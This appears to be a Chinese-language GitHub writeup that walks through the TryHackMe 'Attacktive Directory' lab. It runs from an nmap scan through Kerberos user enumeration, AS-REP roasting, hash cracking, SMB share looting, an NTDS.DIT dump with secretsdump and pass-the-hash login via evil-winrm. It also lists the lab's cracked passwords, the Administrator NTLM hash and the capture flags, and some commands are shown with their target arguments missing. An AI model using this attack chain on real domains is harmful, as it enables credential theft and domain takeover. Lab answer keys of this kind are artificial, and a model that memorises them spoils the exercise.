Ayyub2110/Attacktive_directory
GitHub: Ayyub2110/Attacktive_directory
一份针对 TryHackMe Active Directory 靶机实验的完整渗透测试通关笔记。
Stars: 0 | Forks: 0
# ATTACKTIVE DIRECTORY Writeup
**房间:** ATTACKTIVE DIRECTORY
**目标 IP:** 10.49.180.229
## 工作流程
### 初始侦察:端口扫描
对目标运行基本的端口扫描:
nmap -sC -sV -T4 -oN nmap_results
```
$ cat nmap_results
# Nmap 7.98 scan initiated Wed Jul 8 10:03:04 2026 as: /usr/lib/nmap/nmap --privileged -sC -sV -T4 -p- -oN nmap_results 10.49.180.229
Warning: 10.49.180.229 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.49.180.229
Host is up (0.12s latency).
Not shown: 65508 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-08 14:24:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-07-08T14:25:14+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2026-07-07T14:02:10
|_Not valid after: 2027-01-06T14:02:10
|_ssl-date: 2026-07-08T14:25:22+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49841/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-07-08T14:25:15
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 8 10:25:31 2026 -- 1 IP address (1 host up) scanned in 1347.43 seconds
```
## 任务 3:通过 SMB 进行枚举
### 问题 1:什么工具可以让我们枚举端口 139/445?
**答案:** `enum4linux`
445/tcp 端口 可以使用 enum4linux 进行枚举。
**语法:**
```
enum4linux
```

### 问题 2:该机器的 NetBIOS 域名是什么?
**答案:** THM-AD

### 问题 3:人们通常为其 Active Directory 域使用的无效 TLD 是什么?
**答案:** `.local`
## 任务 4:Kerberos 用户枚举
### 问题 1:Kerbrute 中的哪个命令可以让我们枚举有效的用户名?
**答案:** `userenum`

### 问题 2:发现了哪个值得注意的账户?
**答案:** `svc-admin`

### 问题 3:发现的另一个值得注意的账户是什么?
**答案:** `backup`

## 任务 5:ASREPRoasting - 破解票据
### 问题 1:我们有两个可能可以从中查询票据的用户账户。你可以从哪个用户账户在无密码的情况下查询票据?
**答案:** `svc-admin`
**语法:**
```
python GetNPUsers.py -no-pass -usersfile userlist.txt -dc-ip 10.49.180.229 thm-ad/
```

### 问题 2:查看 Hashcat Examples Wiki 页面,我们从 KDC 检索到的 Kerberos 哈希是什么类型?
**答案:** Kerberos 5, etype 23, AS-REP
### 问题 3:该哈希的模式(mode)是什么?
**答案:** `18200`
### 问题 4:现在使用提供的修改后的密码列表破解哈希,该用户的账户密码是什么?
**答案:** `management2005`
**语法:**
```
john --wordlist=passwordlist.txt --format=krb5asrep hash
```

## 任务 6:SMB 共享访问
### 问题 1:我们可以使用什么实用程序来映射远程 SMB 共享?
**答案:** `smbclient`
### 问题 2:哪个选项可以列出共享?
**答案:** `-L`
### 问题 3:服务器列出了多少个远程共享?
**答案:** `6`
**语法:**
```
smbclient -L \\\\\\\\ -U 'svc-admin'
```

### 问题 4:有一个我们有权访问的特殊共享,其中包含一个文本文件。它是哪个共享?
**答案:** `backup`
**语法:**
```
smbclient \\\\\\backup -U 'svc-admin'
```

### 问题 5:该文件的内容是什么?
**答案:** `YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw`
**语法:**
```
cat backup_credentials.txt
```

### 问题 6:解码该文件的内容,完整内容是什么?
**答案:** `backup@spookysec.local:backup2517860`
**语法:**
```
echo "raw content from backup_credentials.txt" | base64 -d
```

## 任务 7:域权限提升
### 问题 1:什么方法让我们能够导出 NTDS.DIT?
**答案:** `DRSUAPI`
**语法:**
```
python secretsdump.py -just-dc backup@
```

### 问题 2:Administrator 的 NTLM 哈希是什么?
**答案:** `0e0363213e37b94221497260b0bcb4fc`

### 问题 3:什么攻击方法可以让我们在无需密码的情况下以该用户身份进行身份验证?
**答案:** PASS THE HASH
### 问题 4:使用名为 Evil-WinRM 的工具,哪个选项可以让我们使用哈希?
**答案:** `-H`
## 任务 8:获取 Flag
### 问题 1:svc-admin flag
**答案:** `TryHackMe{K3rb3r0s_Pr3_4uth}`
**语法:**
```
evil-winrm -i -u administrator -H
```

### 问题 2:backup flag
**答案:** `TryHackMe{B4ckM3UpSc0tty!}`

### 问题 3:administrator flag
**答案:** `TryHackMe{4ctiveD1rectoryM4st3r}`

标签:CTI, Web报告查看器, Windows活动目录, 协议分析, 权限提升, 网络安全, 逆向工具, 隐私保护